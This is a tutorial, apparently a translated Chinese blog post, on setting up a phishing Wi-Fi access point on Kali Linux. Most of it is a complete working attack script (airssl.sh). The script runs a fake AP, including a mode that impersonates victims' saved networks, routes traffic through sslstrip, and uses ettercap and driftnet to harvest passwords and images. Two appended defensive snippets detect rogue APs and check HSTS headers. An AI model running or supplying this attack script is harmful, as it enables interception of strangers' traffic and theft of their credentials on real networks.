
Setting up a phishing Wi-Fi AP on Kali Linux

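I was excited all through midday: just before lunch today I finally got the phishing AP set up. I had kept running into all sorts of problems and solved them one by one, so here I am writing down the setup method and the problems that came up.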

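Setting up a phishing Wi-Fi AP is simple. Six things are required:

1. A wireless network card; here I use a 拓石 N87 card

2. The Kali Linux operating system, which goes without saying

3. The isc-dhcp-server DHCP server. After installing Kali Linux, just run apt-get update and then apt-get install isc-dhcp-server

4. The Aircrack-ng suite, used to send data

5. sslstrip, used to bypass SSL encryption

6. ettercap, used for sniffing and hijacking

Kali Linux ships with the last three tools, so they do not need to be installed.

One point up front: the bash script given later is written for setups that use isc-dhcp-server to create the phishing hotspot.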

Install the DHCP service

apt-get install isc-dhcp-server

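The configuration files are /etc/default/isc-dhcp-server and /etc/dhcp/dhcpd.conf; the former sets the interface the server listens on (wlan0 in this example)

After editing the DHCP configuration files, disconnect wlan0 from its network and assign it an IP address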

ifconfig wlan0 192.168.1.2/24

Start the DHCP service

/etc/init.d/isc-dhcp-server start or

service isc-dhcp-server start

Create the hotspot:

Give the airssl.sh script written below execute permission

bash airssl.sh

The script then goes through, in order: creating the AP, setting up DHCP, starting sslstrip, and starting ettercap.

The code is as follows:

#!/bin/bash
# Modified version; the original version's information follows:
########################################################
# ©opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
########################################################
# Network questions
echo "AIRSSL_KALI"
echo "修該版本,适用于kali或者使用isc-dhcp-server的環境,原版資訊如下:"
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "
echo "僅供學習用途"
echo
route -n -A inet | grep UG
echo "DNS伺服器.例如8.8.8.8: "
read -e dnsip
echo "網關位址.例如192.168.0.1:"
read -e gatewayip
echo "接入internet的接口.例如eth1: "
read -e internet_interface
echo "用于建立AP的接口.例如wlan0: "
read -e fakeap_interface
echo "AP的ESSID: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_inter

# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.bak
cp /etc/default/isc-dhcp-server /etc/default/isc-dhcp-server.bak
echo "ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
authoritative;
log-facility local7;
">/etc/dhcp/dhcpd.conf

echo -n "subnet 192.168.0.0 netmask 255.255.255.0 {
  range 192.168.0.100 192.168.0.200; 
  option domain-name-servers ">>/etc/dhcp/dhcpd.conf
echo -n $dnsip>>/etc/dhcp/dhcpd.conf
echo -n ";
# option domain-name "internal.example.org";
  option routers ">>/etc/dhcp/dhcpd.conf
echo -n $gatewayip>>/etc/dhcp/dhcpd.conf
echo -n ";
  option broadcast-address 192.168.0.255;
 default-lease-time 600;
 max-lease-time 7200;
}" >> /etc/dhcp/dhcpd.conf
echo "
DHCPD_CONF=/etc/dhcp/dhcpd.conf
DHCPD_PID=/var/run/dhcpd.pid
INTERFACES="at0"
">/etc/default/isc-dhcp-server
# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "

read ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 $gatewayip netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.0.0 netmask 255.255.255.0 gw $gatewayip 
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# DHCP
echo "[+] Setting up DHCP..."
#touch /var/run/dhcpd.pid
#chown dhcpd:dhcpd /var/run/dhcpd.pid
#xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
#sleep 3
/etc/init.d/isc-dhcp-server start
# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2

# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "使用完畢請鍵入Y恢複系統配置,否則可能會出現問題!"
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
mv /etc/default/isc-dhcp-server.bak /etc/default/isc-dhcp-server
mv /etc/dhcp/dhcpd.conf.bak /etc/dhcp/dhcpd.conf
/etc/init.d/isc-dhcp-server stop 

echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit

fi
exit
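
The two fake-AP modes in the script above leave visible traces in a wireless scan: mode N produces an open network carrying a chosen ESSID, and mode A (respond to all probes) makes one BSSID answer for many ESSIDs. The following is an added example, not part of the original post or of airssl.sh, that flags both patterns in a scan list; the simplified CSV layout, the finding names and the sample rows are constructed assumptions.

```shell
#!/bin/sh
# Added example: flag scan rows consistent with the two fake-AP modes above.
# Input on stdin: constructed, simplified CSV "BSSID,channel,privacy,ESSID".

flag_rogue_aps() {
    awk -F',' '
    NF >= 4 {
        for (i = 1; i <= NF; i++) gsub(/^[ \t]+|[ \t]+$/, "", $i)
        bssid = toupper($1); priv = toupper($3)
        essid = $4
        for (i = 5; i <= NF; i++) essid = essid "," $i   # ESSID may contain commas
        if (essid == "") next                            # hidden ESSID: nothing to compare
        key = bssid SUBSEP essid
        if (key in seen) next                            # count each BSSID/ESSID pair once
        seen[key] = 1
        per_bssid[bssid]++
        if (priv == "OPN") open_by[essid] = open_by[essid] " " bssid
        else               protected[essid] = 1
    }
    END {
        # One radio answering for several names: respond-to-all-probes behaviour.
        for (b in per_bssid)
            if (per_bssid[b] > 1) print "MULTI_ESSID " b " " per_bssid[b]
        # Open copy of a name that is also offered with encryption elsewhere.
        for (e in open_by)
            if (e in protected) {
                n = split(open_by[e], list, " ")
                for (i = 1; i <= n; i++) print "OPEN_TWIN " list[i] " " e
            }
    }' | sort
}

# Constructed sample rows, not real capture data.
sample_scan() {
    cat <<'EOF'
00:11:22:33:44:55,6,WPA2,CorpWiFi
02:AA:BB:CC:DD:01,1,OPN,CorpWiFi
02:AA:BB:CC:DD:02,1,OPN,HomeNet
02:AA:BB:CC:DD:02,1,OPN,CafeGuest
02:AA:BB:CC:DD:02,1,OPN,Airport Free
66:77:88:99:AA:BB,11,OPN,CafeGuest
EOF
}

sample_scan | flag_rogue_aps
```

An ESSID that is open on every BSSID (CafeGuest in the sample) is not reported as a twin, since public hotspots legitimately look like that; only the multi-ESSID radio and the open copy of a protected name are flagged.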
           

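The most important part of doing this is still writing the shell script.

If you can write the script in the latter part of this post entirely by yourself, you are a true expert. I am a newbie; experts are welcome to flame away.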
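
The iptables rule in the script redirects only destination port 80 to sslstrip on port 10000, so sslstrip can act only on requests a browser sends in plain HTTP; a site that serves a strong HSTS policy keeps returning browsers from sending them. This added example (not from the original post) grades a response's Strict-Transport-Security header; the 180-day threshold and the verdict names are assumptions, and the sample headers are constructed.

```shell
#!/bin/sh
# Added example: grade a response's HSTS header, the control that keeps a
# browser from sending the plain-HTTP request that sslstrip depends on.
MIN_AGE=15552000   # assumption: 180 days as the minimum acceptable max-age

hsts_verdict() {   # stdin: raw HTTP response headers; stdout: one verdict word
    awk -v min="$MIN_AGE" '
    { sub(/\r$/, "") }                                 # tolerate CRLF line ends
    $0 == "" { exit }                                  # blank line ends the headers
    tolower($0) ~ /^strict-transport-security[ \t]*:/ && !found {
        found = 1                                      # only the first header is used
        value = tolower($0); sub(/^[^:]*:/, "", value)
        maxage = -1; subs = 0
        n = split(value, d, ";")
        for (i = 1; i <= n; i++) {
            gsub(/^[ \t]+|[ \t]+$/, "", d[i])
            if (d[i] ~ /^max-age[ \t]*=/) {
                v = d[i]; sub(/^max-age[ \t]*=[ \t]*/, "", v); gsub(/"/, "", v)
                if (v ~ /^[0-9]+$/) maxage = v + 0
            } else if (d[i] == "includesubdomains") subs = 1
        }
    }
    END {
        if (!found)            print "missing"       # every visit can start over HTTP
        else if (maxage < 0)   print "invalid"       # no usable max-age directive
        else if (maxage == 0)  print "disabled"      # max-age=0 removes the policy
        else if (maxage < min) print "short"
        else if (!subs)        print "ok-host-only"  # subdomains remain uncovered
        else                   print "ok"
    }'
}

# Constructed sample response headers, not captured from a real site.
printf 'HTTP/1.1 200 OK\r\nStrict-Transport-Security: max-age=300\r\n\r\n' | hsts_verdict
```

Feed it headers fetched over HTTPS, for example `curl -sI https://your-site.example | hsts_verdict`, because browsers ignore this header on plain-HTTP responses. A first visit to a site that is not on a browser preload list is still made before any policy is stored.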
